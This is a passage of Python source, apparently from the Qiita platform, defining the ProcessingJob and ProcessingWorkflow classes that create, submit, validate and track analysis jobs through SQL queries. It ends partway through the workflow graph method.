job_id : str
The job id
Returns
-------
bool
True if the job `job_id` exists. False otherwise.
"""
try:
UUID(job_id)
except ValueError:
return False
with qdb.sql_connection.TRN:
sql = """SELECT EXISTS(SELECT *
FROM qiita.processing_job
WHERE processing_job_id = %s)"""
qdb.sql_connection.TRN.add(sql, [job_id])
return qdb.sql_connection.TRN.execute_fetchlast()
@classmethod
def create(cls, user, parameters, force=False):
"""Creates a new job in the system
Parameters
----------
user : qiita_db.user.User
The user executing the job
parameters : qiita_db.software.Parameters
The parameters of the job being executed
force : bool
Force creation on duplicated parameters
Returns
-------
qiita_db.processing_job.ProcessingJob
The newly created job
Notes
-----
If force is True the job is gonna be created even if another job
exists with the same parameters
"""
TTRN = qdb.sql_connection.TRN
with TTRN:
command = parameters.command
# check if a job with the same parameters already exists
sql = """SELECT processing_job_id, email, processing_job_status,
COUNT(aopj.artifact_id)
FROM qiita.processing_job
LEFT JOIN qiita.processing_job_status
USING (processing_job_status_id)
LEFT JOIN qiita.artifact_output_processing_job aopj
USING (processing_job_id)
WHERE command_id = %s AND processing_job_status IN (
'success', 'waiting', 'running', 'in_construction') {0}
GROUP BY processing_job_id, email,
processing_job_status"""
# we need to use ILIKE because of booleans as they can be
# false or False
params = []
for k, v in viewitems(parameters.values):
# this is necessary in case we have an Iterable as a value
# but that is not unicode or string
if isinstance(v, Iterable) and not isinstance(v, (str,
unicode)):
for vv in v:
params.extend([k, str(vv)])
else:
params.extend([k, str(v)])
if params:
# divided by 2 as we have key-value pairs
len_params = len(params)/2
sql = sql.format(' AND ' + ' AND '.join(
["command_parameters->>%s ILIKE %s"] * len_params))
params = [command.id] + params
TTRN.add(sql, params)
else:
# the sql variable expects the list of parameters but if there
# is no param we need to replace the {0} with an empty string
TTRN.add(sql.format(""), [command.id])
# checking that if the job status is success, it has children
# [2] status, [3] children count
existing_jobs = [r for r in TTRN.execute_fetchindex()
if r[2] != 'success' or r[3] > 0]
if existing_jobs and not force:
raise ValueError(
'Cannot create job because the parameters are the same as '
'jobs that are queued, running or already have '
'succeeded:\n%s' % '\n'.join(
["%s: %s" % (jid, status)
for jid, _, status, _ in existing_jobs]))
sql = """INSERT INTO qiita.processing_job
(email, command_id, command_parameters,
processing_job_status_id)
VALUES (%s, %s, %s, %s)
RETURNING processing_job_id"""
status = qdb.util.convert_to_id(
"in_construction", "processing_job_status")
sql_args = [user.id, command.id,
parameters.dump(), status]
TTRN.add(sql, sql_args)
job_id = TTRN.execute_fetchlast()
# Link the job with the input artifacts
sql = """INSERT INTO qiita.artifact_processing_job
(artifact_id, processing_job_id)
VALUES (%s, %s)"""
pending = defaultdict(dict)
for pname, vals in command.parameters.items():
if vals[0] == 'artifact':
artifact_info = parameters.values[pname]
# If the artifact_info is a list, then the artifact
# still doesn't exists because the current job is part
# of a workflow, so we can't link
if not isinstance(artifact_info, list):
TTRN.add(sql, [artifact_info, job_id])
else:
pending[artifact_info[0]][pname] = artifact_info[1]
if pending:
sql = """UPDATE qiita.processing_job
SET pending = %s
WHERE processing_job_id = %s"""
TTRN.add(sql, [dumps(pending), job_id])
TTRN.execute()
return cls(job_id)
@property
def user(self):
"""The user that launched the job
Returns
-------
qiita_db.user.User
The user that launched the job
"""
with qdb.sql_connection.TRN:
sql = """SELECT email
FROM qiita.processing_job
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
email = qdb.sql_connection.TRN.execute_fetchlast()
return qdb.user.User(email)
@property
def command(self):
"""The command that the job executes
Returns
-------
qiita_db.software.Command
The command that the job executes
"""
with qdb.sql_connection.TRN:
sql = """SELECT command_id
FROM qiita.processing_job
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
cmd_id = qdb.sql_connection.TRN.execute_fetchlast()
return qdb.software.Command(cmd_id)
@property
def parameters(self):
"""The parameters used in the job's command
Returns
-------
qiita_db.software.Parameters
The parameters used in the job's command
"""
with qdb.sql_connection.TRN:
sql = """SELECT command_id, command_parameters
FROM qiita.processing_job
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
res = qdb.sql_connection.TRN.execute_fetchindex()[0]
return qdb.software.Parameters.load(
qdb.software.Command(res[0]), values_dict=res[1])
@property
def input_artifacts(self):
"""The artifacts used as input in the job
Returns
-------
list of qiita_db.artifact.Artifact
The artifacs used as input in the job
"""
with qdb.sql_connection.TRN:
sql = """SELECT artifact_id
FROM qiita.artifact_processing_job
WHERE processing_job_id = %s
ORDER BY artifact_id"""
qdb.sql_connection.TRN.add(sql, [self.id])
return [qdb.artifact.Artifact(aid)
for aid in qdb.sql_connection.TRN.execute_fetchflatten()]
@property
def status(self):
"""The status of the job
Returns
-------
str
The current status of the job, one of {'queued', 'running',
'success', 'error', 'in_construction', 'waiting'}
"""
with qdb.sql_connection.TRN:
sql = """SELECT processing_job_status
FROM qiita.processing_job_status
JOIN qiita.processing_job
USING (processing_job_status_id)
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
return qdb.sql_connection.TRN.execute_fetchlast()
def _set_status(self, value):
"""Sets the status of the job
Parameters
----------
value : str, {'queued', 'running', 'success', 'error',
'in_construction', 'waiting'}
The new status of the job
Raises
------
qiita_db.exceptions.QiitaDBStatusError
- If the current status of the job is 'success'
- If the current status of the job is 'running' and `value` is
'queued'
"""
with qdb.sql_connection.TRN:
current_status = self.status
if current_status == 'success':
raise qdb.exceptions.QiitaDBStatusError(
"Cannot change the status of a 'success' job")
elif current_status == 'running' and value == 'queued':
raise qdb.exceptions.QiitaDBStatusError(
"Cannot revert the status of a 'running' job to 'queued'")
new_status = qdb.util.convert_to_id(
value, "processing_job_status")
sql = """UPDATE qiita.processing_job
SET processing_job_status_id = %s
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [new_status, self.id])
qdb.sql_connection.TRN.execute()
def _generate_cmd(self):
"""Generates the command to submit the job
Returns
-------
str
The command to use to submit the job
"""
job_dir = join(qdb.util.get_work_base_dir(), self.id)
software = self.command.software
plugin_start_script = software.start_script
plugin_env_script = software.environment_script
# Appending the portal URL so the job requests the information from the
# portal server that submitted the job
url = "%s%s" % (qiita_config.base_url, qiita_config.portal_dir)
cmd = '%s "%s" "%s" "%s" "%s" "%s"' % (
qiita_config.plugin_launcher, plugin_env_script,
plugin_start_script, url, self.id, job_dir)
return cmd
def submit(self):
"""Submits the job to execution
Raises
------
QiitaDBOperationNotPermittedError
If the job is not in 'waiting' or 'in_construction' status
"""
with qdb.sql_connection.TRN:
status = self.status
if status not in {'in_construction', 'waiting'}:
raise qdb.exceptions.QiitaDBOperationNotPermittedError(
"Can't submit job, not in 'in_construction' or "
"'waiting' status. Current status: %s" % status)
self._set_status('queued')
# At this point we are going to involve other processes. We need
# to commit the changes to the DB or the other processes will not
# see these changes
qdb.sql_connection.TRN.commit()
cmd = self._generate_cmd()
p = Process(target=_job_submitter, args=(self.id, cmd))
p.start()
def release(self):
"""Releases the job from the waiting status and creates the artifact
Returns
-------
dict of {int: int}
The mapping between the job output and the artifact
"""
with qdb.sql_connection.TRN:
if self.command.software.type != 'artifact definition':
raise qdb.exceptions.QiitaDBOperationNotPermittedError(
"Only artifact definition jobs can be released")
# Retrieve the artifact information from the DB
sql = """SELECT artifact_info
FROM qiita.processing_job_validator
WHERE validator_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
a_info = qdb.sql_connection.TRN.execute_fetchlast()
provenance = loads(self.parameters.values['provenance'])
job = ProcessingJob(provenance['job'])
if 'data_type' in a_info:
# This job is resulting from a private job
parents = None
params = None
cmd_out_id = None
name = None
data_type = a_info['data_type']
analysis = qdb.analysis.Analysis(
job.parameters.values['analysis'])
a_info = a_info['artifact_data']
else:
# This job is resulting from a plugin job
parents = job.input_artifacts
params = job.parameters
cmd_out_id = provenance['cmd_out_id']
name = provenance['name']
analysis = None
data_type = None
# Create the artifact
atype = a_info['artifact_type']
filepaths = a_info['filepaths']
a = qdb.artifact.Artifact.create(
filepaths, atype, parents=parents,
processing_parameters=params,
analysis=analysis, data_type=data_type, name=name)
self._set_status('success')
mapping = {}
if cmd_out_id is not None:
mapping = {cmd_out_id: a.id}
return mapping
def release_validators(self):
"""Allows all the validator job spawned by this job to complete"""
with qdb.sql_connection.TRN:
if self.command.software.type not in ('artifact transformation',
'private'):
raise qdb.exceptions.QiitaDBOperationNotPermittedError(
"Only artifact transformation and private jobs can "
"release validators")
# Check if all the validators are completed. Validator jobs can be
# in two states when completed: 'waiting' in case of success
# or 'error' otherwise
sql = """SELECT pjv.validator_id
FROM qiita.processing_job_validator pjv
JOIN qiita.processing_job pj ON
pjv.validator_id = pj.processing_job_id
JOIN qiita.processing_job_status USING
(processing_job_status_id)
WHERE pjv.processing_job_id = %s
AND processing_job_status NOT IN %s"""
sql_args = [self.id, ('waiting', 'error')]
qdb.sql_connection.TRN.add(sql, sql_args)
validator_ids = qdb.sql_connection.TRN.execute_fetchindex()
# Active polling - wait until all validator jobs are completed
while validator_ids:
jids = ', '.join([j[0] for j in validator_ids])
self.step = ("Validating outputs (%d remaining) via "
"job(s) %s" % (len(validator_ids), jids))
sleep(10)
qdb.sql_connection.TRN.add(sql, sql_args)
validator_ids = qdb.sql_connection.TRN.execute_fetchindex()
# Check if any of the validators errored
sql = """SELECT validator_id
FROM qiita.processing_job_validator pjv
JOIN qiita.processing_job pj
ON pjv.validator_id = pj.processing_job_id
JOIN qiita.processing_job_status USING
(processing_job_status_id)
WHERE pjv.processing_job_id = %s AND
processing_job_status = %s"""
qdb.sql_connection.TRN.add(sql, [self.id, 'error'])
errored = qdb.sql_connection.TRN.execute_fetchflatten()
if errored:
# At least one of the validators failed, Set the rest of the
# validators and the current job as failed
qdb.sql_connection.TRN.add(sql, [self.id, 'waiting'])
waiting = qdb.sql_connection.TRN.execute_fetchflatten()
common_error = "\n".join(
["Validator %s error message: %s"
% (j, ProcessingJob(j).log.msg) for j in errored])
val_error = "%d sister validator jobs failed: %s" % (
len(errored), common_error)
for j in waiting:
ProcessingJob(j)._set_error(val_error)
self._set_error('%d validator jobs failed: %s'
% (len(errored), common_error))
else:
# All validators have successfully completed
sql = """SELECT validator_id
FROM qiita.processing_job_validator
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
mapping = {}
# Loop through all validator jobs and release them, allowing
# to create the artifacts. Note that if any artifact creation
# fails, the rollback operation will make sure that the
# previously created artifacts are not in there
for jid in qdb.sql_connection.TRN.execute_fetchflatten():
vjob = ProcessingJob(jid)
mapping.update(vjob.release())
if mapping:
sql = """INSERT INTO
qiita.artifact_output_processing_job
(artifact_id, processing_job_id,
command_output_id)
VALUES (%s, %s, %s)"""
sql_args = [[aid, self.id, outid]
for outid, aid in viewitems(mapping)]
qdb.sql_connection.TRN.add(sql, sql_args, many=True)
self._update_and_launch_children(mapping)
self._set_status('success')
def _complete_artifact_definition(self, artifact_data):
""""Performs the needed steps to complete an artifact definition job
In order to complete an artifact definition job we need to create
the artifact, and then start all the jobs that were waiting for this
artifact to be created. Note that each artifact definition job creates
one and only one artifact.
Parameters
----------
artfact_data : {'filepaths': list of (str, str), 'artifact_type': str}
Dict with the artifact information. `filepaths` contains the list
of filepaths and filepath types for the artifact and
`artifact_type` the type of the artifact
"""
with qdb.sql_connection.TRN:
atype = artifact_data['artifact_type']
filepaths = artifact_data['filepaths']
# We need to differentiate if this artifact is the
# result of a previous job or uploading
job_params = self.parameters.values
if job_params['provenance'] is not None:
# The artifact is a result from a previous job
provenance = loads(job_params['provenance'])
if provenance.get('data_type') is not None:
artifact_data = {'data_type': provenance['data_type'],
'artifact_data': artifact_data}
sql = """UPDATE qiita.processing_job_validator
SET artifact_info = %s
WHERE validator_id = %s"""
qdb.sql_connection.TRN.add(
sql, [dumps(artifact_data), self.id])
qdb.sql_connection.TRN.execute()
# Can't create the artifact until all validators are completed
self._set_status('waiting')
else:
# The artifact is uploaded by the user or is the initial
# artifact of an analysis
if ('analysis' in job_params and
job_params['analysis'] is not None):
pt = None
an = qdb.analysis.Analysis(job_params['analysis'])
sql = """SELECT data_type
FROM qiita.analysis_processing_job
WHERE analysis_id = %s
AND processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [an.id, self.id])
data_type = qdb.sql_connection.TRN.execute_fetchlast()
else:
pt = qdb.metadata_template.prep_template.PrepTemplate(
job_params['template'])
an = None
data_type = None
qdb.artifact.Artifact.create(
filepaths, atype, prep_template=pt, analysis=an,
data_type=data_type, name=job_params['name'])
self._set_status('success')
def _complete_artifact_transformation(self, artifacts_data):
"""Performs the needed steps to complete an artifact transformation job
In order to complete an artifact transformation job, we need to create
a validate job for each artifact output and submit it.
Parameters
----------
artifacts_data : dict of dicts
The generated artifact information keyed by output name.
The format of each of the internal dictionaries must be
{'filepaths': list of (str, str), 'artifact_type': str}
where `filepaths` contains the list of filepaths and filepath types
for the artifact and `artifact_type` the type of the artifact
Raises
------
QiitaDBError
If there is more than one prep information attached to the new
artifact
"""
validator_jobs = []
with qdb.sql_connection.TRN:
cmd_id = self.command.id
for out_name, a_data in viewitems(artifacts_data):
# Correct the format of the filepaths parameter so we can
# create a validate job
filepaths = defaultdict(list)
for fp, fptype in a_data['filepaths']:
filepaths[fptype].append(fp)
atype = a_data['artifact_type']
# The valdiate job needs a prep information file. In theory,
# a job can be generated from more that one prep information
# file, so we check here if we have one or more templates. At
# this moment, If we allow more than one template, there is a
# fair amount of changes that need to be done on the plugins,
# so we are going to restrict the number of templates to one.
# Note that at this moment there is no way of generating an
# artifact from 2 or more artifacts, so we can impose this
# limitation now and relax it later.
templates = set()
for artifact in self.input_artifacts:
templates.update(pt.id for pt in artifact.prep_templates)
template = None
analysis = None
if len(templates) > 1:
raise qdb.exceptions.QiitaDBError(
"Currently only single prep template "
"is allowed, found %d" % len(templates))
elif len(templates) == 1:
template = templates.pop()
else:
# In this case we have 0 templates. What this means is that
# this artifact is being generated in the analysis pipeline
# All the artifacts included in the analysis pipeline
# belong to the same analysis, so we can just ask the
# first artifact for the analysis that it belongs to
analysis = self.input_artifacts[0].analysis.id
# Once the validate job completes, it needs to know if it has
# been generated from a command (and how) or if it has been
# uploaded. In order to differentiate these cases, we populate
# the provenance parameter with some information about the
# current job and how this artifact has been generated. This
# does not affect the plugins since they can ignore this
# parameter
sql = """SELECT command_output_id
FROM qiita.command_output
WHERE name = %s AND command_id = %s"""
qdb.sql_connection.TRN.add(sql, [out_name, cmd_id])
cmd_out_id = qdb.sql_connection.TRN.execute_fetchlast()
naming_params = self.command.naming_order
if naming_params:
params = self.parameters.values
art_name = "%s %s" % (
out_name, ' '.join([str(params[p])
for p in naming_params]))
else:
art_name = out_name
provenance = {'job': self.id,
'cmd_out_id': cmd_out_id,
'name': art_name}
# Get the validator command for the current artifact type and
# create a new job
cmd = qdb.software.Command.get_validator(atype)
values_dict = {
'files': dumps(filepaths), 'artifact_type': atype,
'template': template, 'provenance': dumps(provenance),
'analysis': None}
if analysis is not None:
values_dict['analysis'] = analysis
validate_params = qdb.software.Parameters.load(
cmd, values_dict=values_dict)
validator_jobs.append(
ProcessingJob.create(self.user, validate_params, True))
# Change the current step of the job
self.step = "Validating outputs (%d remaining) via job(s) %s" % (
len(validator_jobs), ', '.join([j.id for j in validator_jobs]))
# Link all the validator jobs with the current job
self._set_validator_jobs(validator_jobs)
# Submit all the validator jobs
for j in validator_jobs:
j.submit()
# Submit the job that will release all the validators
plugin = qdb.software.Software.from_name_and_version(
'Qiita', 'alpha')
cmd = plugin.get_command('release_validators')
params = qdb.software.Parameters.load(
cmd, values_dict={'job': self.id})
job = ProcessingJob.create(self.user, params)
# Doing the submission outside of the transaction
job.submit()
def _set_validator_jobs(self, validator_jobs):
"""Sets the validator jobs for the current job
Parameters
----------
validator_jobs : list of ProcessingJob
The validator_jobs for the current job
"""
with qdb.sql_connection.TRN:
sql = """INSERT INTO qiita.processing_job_validator
(processing_job_id, validator_id)
VALUES (%s, %s)"""
sql_args = [[self.id, j.id] for j in validator_jobs]
qdb.sql_connection.TRN.add(sql, sql_args, many=True)
qdb.sql_connection.TRN.execute()
def complete(self, success, artifacts_data=None, error=None):
"""Completes the job, either with a success or error status
Parameters
----------
success : bool
Whether the job has completed successfully or not
artifacts_data : dict of dicts, optional
The generated artifact information keyed by output name.
The format of each of the internal dictionaries must be
{'filepaths': list of (str, str), 'artifact_type': str}
where `filepaths` contains the list of filepaths and filepath types
for the artifact and `artifact_type` the type of the artifact
error : str, optional
If the job was not successful, the error message
Raises
------
qiita_db.exceptions.QiitaDBOperationNotPermittedError
If the job is not in running state
"""
with qdb.sql_connection.TRN:
if success:
if self.status != 'running':
# If the job is not running, we only allow to complete it
# if it did not succeed
raise qdb.exceptions.QiitaDBOperationNotPermittedError(
"Can't complete job: not in a running state")
if artifacts_data:
if self.command.software.type == 'artifact definition':
# There is only one artifact created
_, a_data = artifacts_data.popitem()
self._complete_artifact_definition(a_data)
else:
self._complete_artifact_transformation(artifacts_data)
else:
self._set_status('success')
else:
self._set_error(error)
@property
def log(self):
"""The log entry attached to the job if it failed
Returns
-------
qiita_db.logger.LogEntry or None
If the status of the job is `error`, returns the LogEntry attached
to the job
"""
with qdb.sql_connection.TRN:
res = None
if self.status == 'error':
sql = """SELECT logging_id
FROM qiita.processing_job
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
log_id = qdb.sql_connection.TRN.execute_fetchlast()
res = qdb.logger.LogEntry(log_id)
return res
def _set_error(self, error):
"""Attaches a log entry to the job
Parameters
----------
error : str
The error message
Raises
------
qiita_db.exceptions.QiitaDBOperationNotPermittedError
If the status of the job is 'success'
"""
with qdb.sql_connection.TRN:
if self.status == 'success':
raise qdb.exceptions.QiitaDBOperationNotPermittedError(
"Can only set up the log for jobs whose status is 'error'")
self._set_status('error')
log = qdb.logger.LogEntry.create('Runtime', error)
sql = """UPDATE qiita.processing_job
SET logging_id = %s
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [log.id, self.id])
qdb.sql_connection.TRN.execute()
# All the children should be marked as failure
for c in self.children:
c.complete(False, error="Parent job '%s' failed." % self.id)
@property
def heartbeat(self):
"""The timestamp of the last heartbeat received from the job
Returns
-------
datetime
The last heartbeat timestamp
"""
with qdb.sql_connection.TRN:
sql = """SELECT heartbeat
FROM qiita.processing_job
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
return qdb.sql_connection.TRN.execute_fetchlast()
def update_heartbeat_state(self):
"""Updates the heartbeat of the job
In case that the job is in `queued` status, it changes the status to
`running`.
Raises
------
QiitaDBOperationNotPermittedError
If the job is already completed
"""
with qdb.sql_connection.TRN:
status = self.status
if status == 'queued':
self._set_status('running')
elif status != 'running':
raise qdb.exceptions.QiitaDBOperationNotPermittedError(
"Can't execute heartbeat on job: already completed")
sql = """UPDATE qiita.processing_job
SET heartbeat = %s
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [datetime.now(), self.id])
qdb.sql_connection.TRN.execute()
@property
def step(self):
"""Returns the current step of the job
Returns
-------
str
The current step of the job
"""
with qdb.sql_connection.TRN:
sql = """SELECT step
FROM qiita.processing_job
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
return qdb.sql_connection.TRN.execute_fetchlast()
@step.setter
def step(self, value):
"""Sets the current step of the job
Parameters
----------
value : str
The new current step of the job
Raises
------
qiita_db.exceptions.QiitaDBOperationNotPermittedError
If the status of the job is not 'running'
"""
with qdb.sql_connection.TRN:
if self.status != 'running':
raise qdb.exceptions.QiitaDBOperationNotPermittedError(
"Cannot change the step of a job whose status is not "
"'running'")
sql = """UPDATE qiita.processing_job
SET step = %s
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [value, self.id])
qdb.sql_connection.TRN.execute()
@property
def children(self):
"""The children jobs
Returns
-------
generator of qiita_db.processing_job.ProcessingJob
The children jobs
"""
with qdb.sql_connection.TRN:
sql = """SELECT child_id
FROM qiita.parent_processing_job
WHERE parent_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
for jid in qdb.sql_connection.TRN.execute_fetchflatten():
yield ProcessingJob(jid)
def _update_children(self, mapping):
"""Updates the children of the current job to populate the input params
Parameters
----------
mapping : dict of {int: int}
The mapping between output parameter and artifact
Returns
-------
list of qiita_db.processing_job.ProcessingJob
The list of childrens that are ready to be submitted
"""
ready = []
with qdb.sql_connection.TRN:
sql = """SELECT command_output_id, name
FROM qiita.command_output
WHERE command_output_id IN %s"""
sql_args = [tuple(mapping.keys())]
qdb.sql_connection.TRN.add(sql, sql_args)
res = qdb.sql_connection.TRN.execute_fetchindex()
new_map = {name: mapping[oid] for oid, name in res}
sql = """SELECT command_parameters, pending
FROM qiita.processing_job
WHERE processing_job_id = %s"""
sql_update = """UPDATE qiita.processing_job
SET command_parameters = %s,
pending = %s
WHERE processing_job_id = %s"""
sql_link = """INSERT INTO qiita.artifact_processing_job
(artifact_id, processing_job_id)
VALUES (%s, %s)"""
for c in self.children:
qdb.sql_connection.TRN.add(sql, [c.id])
params, pending = qdb.sql_connection.TRN.execute_fetchflatten()
for pname, out_name in viewitems(pending[self.id]):
a_id = new_map[out_name]
params[pname] = str(a_id)
del pending[self.id]
# Link the input artifact with the child job
qdb.sql_connection.TRN.add(sql_link, [a_id, c.id])
# Force to insert a NULL in the DB if pending is empty
pending = pending if pending else None
qdb.sql_connection.TRN.add(sql_update,
[dumps(params), pending, c.id])
qdb.sql_connection.TRN.execute()
if pending is None:
# The child already has all the parameters
# Add it to the ready list
ready.append(c)
return ready
def _update_and_launch_children(self, mapping):
"""Updates the children of the current job to populate the input params
Parameters
----------
mapping : dict of {int: int}
The mapping between output parameter and artifact
"""
ready = self._update_children(mapping)
# Submit all the children that already have all the input parameters
for c in ready:
c.submit()
@property
def outputs(self):
"""The outputs of the job
Returns
-------
dict of {str: qiita_db.artifact.Artifact}
The outputs of the job keyed by output name
"""
with qdb.sql_connection.TRN:
if self.status != 'success':
raise qdb.exceptions.QiitaDBOperationNotPermittedError(
"Can't return the outputs of a non-success job")
sql = """SELECT artifact_id, name
FROM qiita.artifact_output_processing_job
JOIN qiita.command_output USING (command_output_id)
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
return {
name: qdb.artifact.Artifact(aid)
for aid, name in qdb.sql_connection.TRN.execute_fetchindex()}
@property
def processing_job_workflow(self):
"""The processing job worflow
Returns
-------
ProcessingWorkflow
The processing job workflow the job
"""
with qdb.sql_connection.TRN:
# Retrieve the workflow root jobs
sql = """SELECT get_processing_workflow_roots
FROM qiita.get_processing_workflow_roots(%s)"""
qdb.sql_connection.TRN.add(sql, [self.id])
res = qdb.sql_connection.TRN.execute_fetchindex()
if res:
sql = """SELECT processing_job_workflow_id
FROM qiita.processing_job_workflow_root
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [res[0][0]])
r = qdb.sql_connection.TRN.execute_fetchindex()
return (qdb.processing_job.ProcessingWorkflow(r[0][0]) if r
else None)
else:
return None
@property
def pending(self):
"""A dictionary with the information about the predecessor jobs
Returns
-------
dict
A dict with {job_id: {parameter_name: output_name}}"""
with qdb.sql_connection.TRN:
sql = """SELECT pending
FROM qiita.processing_job
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
res = qdb.sql_connection.TRN.execute_fetchlast()
return res if res is not None else {}
@property
def hidden(self):
"""Whether the job is hidden or not
Returns
-------
bool
Whether the jobs is hidden or not
"""
with qdb.sql_connection.TRN:
sql = """SELECT hidden
FROM qiita.processing_job
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
return qdb.sql_connection.TRN.execute_fetchlast()
def hide(self):
"""Hides the job from the user
Raises
------
QiitaDBOperationNotPermittedError
If the job is not in the error status
"""
with qdb.sql_connection.TRN:
status = self.status
if status != 'error':
raise qdb.exceptions.QiitaDBOperationNotPermittedError(
'Only jobs in error status can be hidden. Current status: '
'%s' % status)
sql = """UPDATE qiita.processing_job
SET hidden = %s
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [True, self.id])
qdb.sql_connection.TRN.execute()
class ProcessingWorkflow(qdb.base.QiitaObject):
"""Models a workflow defined by the user
Parameters
----------
user : qiita_db.user.User
The user that modeled the workflow
root : list of qiita_db.processing_job.ProcessingJob
The first job in the workflow
"""
_table = "processing_job_workflow"
@classmethod
def _common_creation_steps(cls, user, root_jobs, name=None):
"""Executes the common creation steps
Parameters
----------
user : qiita_db.user.User
The user creating the workflow
root_jobs : list of qiita_db.processing_job.ProcessingJob
The root jobs of the workflow
name : str, optional
The name of the workflow. Default: generated from user's name
"""
with qdb.sql_connection.TRN:
# Insert the workflow in the processing_job_workflow table
name = name if name else "%s's workflow" % user.info['name']
sql = """INSERT INTO qiita.processing_job_workflow (email, name)
VALUES (%s, %s)
RETURNING processing_job_workflow_id"""
qdb.sql_connection.TRN.add(sql, [user.email, name])
w_id = qdb.sql_connection.TRN.execute_fetchlast()
# Connect the workflow with it's initial set of jobs
sql = """INSERT INTO qiita.processing_job_workflow_root
(processing_job_workflow_id, processing_job_id)
VALUES (%s, %s)"""
sql_args = [[w_id, j.id] for j in root_jobs]
qdb.sql_connection.TRN.add(sql, sql_args, many=True)
qdb.sql_connection.TRN.execute()
return cls(w_id)
@classmethod
def from_default_workflow(cls, user, dflt_wf, req_params, name=None,
force=False):
"""Creates a new processing workflow from a default workflow
Parameters
----------
user : qiita_db.user.User
The user creating the workflow
dflt_wf : qiita_db.software.DefaultWorkflow
The default workflow
req_params : dict of {qdb.software.Command: dict of {str: object}}
The required parameters values for the source commands in the
workflow, keyed by command. The inner dicts are keyed by
parameter name.
name : str, optional
Name of the workflow. Default: generated from user's name
force : bool
Force creation on duplicated parameters
Returns
-------
qiita_db.processing_job.ProcessingWorkflow
The newly created workflow
"""
with qdb.sql_connection.TRN:
dflt_g = dflt_wf.graph
# Find the roots of the workflow. That is, the nodes that do not
# have a parent in the graph (in_degree = 0)
in_degrees = dflt_g.in_degree()
# We can potentially access this information from the nodes
# multiple times, so caching in here
all_nodes = {n: (n.command, n.parameters)
for n in in_degrees}
roots = {n: (n.command, n.parameters)
for n, d in viewitems(in_degrees) if d == 0}
# Check that we have all the required parameters
root_cmds = set(c for c, _ in viewvalues(roots))
if root_cmds != set(req_params):
error_msg = ['Provided required parameters do not match the '
'initial set of commands for the workflow.']
missing = [c.name for c in root_cmds - set(req_params)]
if missing:
error_msg.append(
' Command(s) "%s" are missing the required parameter '
'set.' % ', '.join(missing))
extra = [c.name for c in set(req_params) - root_cmds]
if extra:
error_msg.append(
' Paramters for command(s) "%s" have been provided, '
'but they are not the initial commands for the '
'workflow.' % ', '.join(extra))
raise qdb.exceptions.QiitaDBError(''.join(error_msg))
# Start creating the root jobs
node_to_job = {
n: ProcessingJob.create(
user,
qdb.software.Parameters.from_default_params(
p, req_params[c]), force)
for n, (c, p) in viewitems(roots)}
root_jobs = node_to_job.values()
# SQL used to create the edges between jobs
sql = """INSERT INTO qiita.parent_processing_job
(parent_id, child_id)
VALUES (%s, %s)"""
# Create the rest of the jobs. These are different form the root
# jobs because they depend on other jobs to complete in order to be
# submitted
for n in nx.topological_sort(dflt_g):
if n in node_to_job:
# We have already visited this node
# (because it is a root node)
continue
cmd, dflt_params = all_nodes[n]
job_req_params = {}
parent_ids = []
# Each incoming edge represents an artifact that is generated
# by the source job of the edge
for source, dest, data in dflt_g.in_edges(n, data=True):
# Retrieve the id of the parent job - it already exists
# because we are visiting the nodes in topological order
source_id = node_to_job[source].id
parent_ids.append(source_id)
# Get the connections between the job and the source
connections = data['connections'].connections
for out, in_param in connections:
# We take advantage of the fact the parameters are
# stored in JSON to encode the name of the output
# artifact from the previous job
job_req_params[in_param] = [source_id, out]
# At this point we should have all the requried parameters for
# the current job, so create it
new_job = ProcessingJob.create(
user, qdb.software.Parameters.from_default_params(
dflt_params, job_req_params), force)
node_to_job[n] = new_job
# Create the parent-child links in the DB
sql_args = [[pid, new_job.id] for pid in parent_ids]
qdb.sql_connection.TRN.add(sql, sql_args, many=True)
return cls._common_creation_steps(user, root_jobs, name)
@classmethod
def from_scratch(cls, user, parameters, name=None, force=False):
"""Creates a new processing workflow from scratch
Parameters
----------
user : qiita_db.user.User
The user creating the workflow
parameters : qiita_db.software.Parameters
The parameters of the first job in the workflow
name : str, optional
Name of the workflow. Default: generated from user's name
force : bool
Force creation on duplicated parameters
Returns
-------
qiita_db.processing_job.ProcessingWorkflow
The newly created workflow
"""
job = ProcessingJob.create(user, parameters, force)
return cls._common_creation_steps(user, [job], name)
@property
def name(self):
""""The name of the workflow
Returns
-------
str
The name of the workflow
"""
with qdb.sql_connection.TRN:
sql = """SELECT name
FROM qiita.processing_job_workflow
WHERE processing_job_workflow_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
return qdb.sql_connection.TRN.execute_fetchlast()
@property
def user(self):
"""The user that created the workflow
Returns
-------
qdb.user.User
The user that created the workflow
"""
with qdb.sql_connection.TRN:
sql = """SELECT email
FROM qiita.processing_job_workflow
WHERE processing_job_workflow_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
email = qdb.sql_connection.TRN.execute_fetchlast()
return qdb.user.User(email)
@property
def graph(self):
"""Returns the graph of jobs that represent the workflow
Returns
-------
networkx.DiGraph
The graph representing the workflow
"""
g = nx.DiGraph()
with qdb.sql_connection.TRN:
# Retrieve all graph workflow nodes
sql = """SELECT parent_id, child_id
FROM qiita.get_processing_workflow_edges(%s)"""
qdb.sql_connection.TRN.add(sql, [self.id])
